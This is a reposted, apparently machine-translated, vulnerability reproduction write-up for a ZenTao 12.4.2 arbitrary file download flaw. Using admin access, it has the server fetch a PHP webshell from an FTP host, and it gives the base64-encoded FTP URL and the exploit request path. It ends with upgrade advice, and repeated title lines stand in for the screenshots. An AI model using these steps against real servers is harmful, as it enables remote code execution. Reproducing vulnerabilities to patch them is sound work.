Home >Operation and Maintenance >Safety >What are the background administrator rights of Getshell in ZenTao 12.4.2?

What are the background administrator rights of Getshell in ZenTao 12.4.2?

WBOY
WBOYforward
2023-05-16 15:43:121571browse

0x00Introduction

ZenTao is a professional domestic open source R&D project management software that integrates product management and project management , quality management, document management, organizational management and transaction management, completely covering the core processes of R&D project management. The management idea is based on the internationally popular agile project management method - Scrum. On the basis of following its values, combined with the current status of domestic project research and development, it integrates multiple functions such as task management, demand management, bug management, use case management, etc., covering software from planning to to the entire life cycle of a release.

0x01 Vulnerability Overview

ZenTao 12.4.2 version has an arbitrary file download vulnerability. This vulnerability is due to the loose filtering in the download method in the client class, which can be achieved using ftp. Purpose of downloading files. And the downloaded file storage directory can parse php files, causing getshell.

0x02 Affected version

ZenTao≤ 12.4.2

0x03Environment construction

phpstudy2018 Zen Tao 12.4.2 Zen Tao official download address:

https://www.zentao.net/dynamic/zentaopms12.4.2-80263.html

3.1. After the download is completed, put it into phpstudy Just install it in

What are the background administrator rights of Getshell in ZenTao 12.4.2?

#3.2. Check the extension. If there is an extension that fails, just open the extension in phpstudy.

What are the background administrator rights of Getshell in ZenTao 12.4.2?

#3.3. Set the database information, set it to your own database configuration here.

What are the background administrator rights of Getshell in ZenTao 12.4.2?

3.4. Set up the account and the installation is completed

What are the background administrator rights of Getshell in ZenTao 12.4.2?

##3.4. Use the environment to set up and enable the ftp service. Taking windows2008R2 as an example, add roles and add ftp

What are the background administrator rights of Getshell in ZenTao 12.4.2?

What are the background administrator rights of Getshell in ZenTao 12.4.2?##3.5. Then in the Internet Information Service Add ftp service to the website below.

What are the background administrator rights of Getshell in ZenTao 12.4.2?3.6. Configure according to your own situation, and the next step is

What are the background administrator rights of Getshell in ZenTao 12.4.2?

What are the background administrator rights of Getshell in ZenTao 12.4.2?

What are the background administrator rights of Getshell in ZenTao 12.4.2?3.7. Place a webshell in the ftp directory and use the browser to check whether ftp can be accessed normally

What are the background administrator rights of Getshell in ZenTao 12.4.2?

0x04 Vulnerability Recurrence

1. First add the path of ftp to shell and perform base64 encoding.

Before encryption: ftp://192.168.3.200/shell.php

After encryption: ZnRwJTNBLy8xOTIuMTY4LjMuMjAwL3NoZWxsLnBocA==

2. Use EXP and put the encrypted base64 into the in exp

http://127.0.0.1/zentaopms/www/index.php /client-download-1--1.html

What are the background administrator rights of Getshell in ZenTao 12.4.2?

##3. Use the following link path to test Whether the shell has been downloaded to the serverWhat are the background administrator rights of Getshell in ZenTao 12.4.2?

http://192.168.3.200/zentaopms/www/data/client/1/shell.php

What are the background administrator rights of Getshell in ZenTao 12.4.2?0x05 Repair method

1. Upgrade to ZenTao 12.4.3 and later versions

The above is the detailed content of What are the background administrator rights of Getshell in ZenTao 12.4.2?. For more information, please follow other related articles on the PHP Chinese website!

Statement:
This article is reproduced at:yisu.com. If there is any infringement, please contact admin@php.cn delete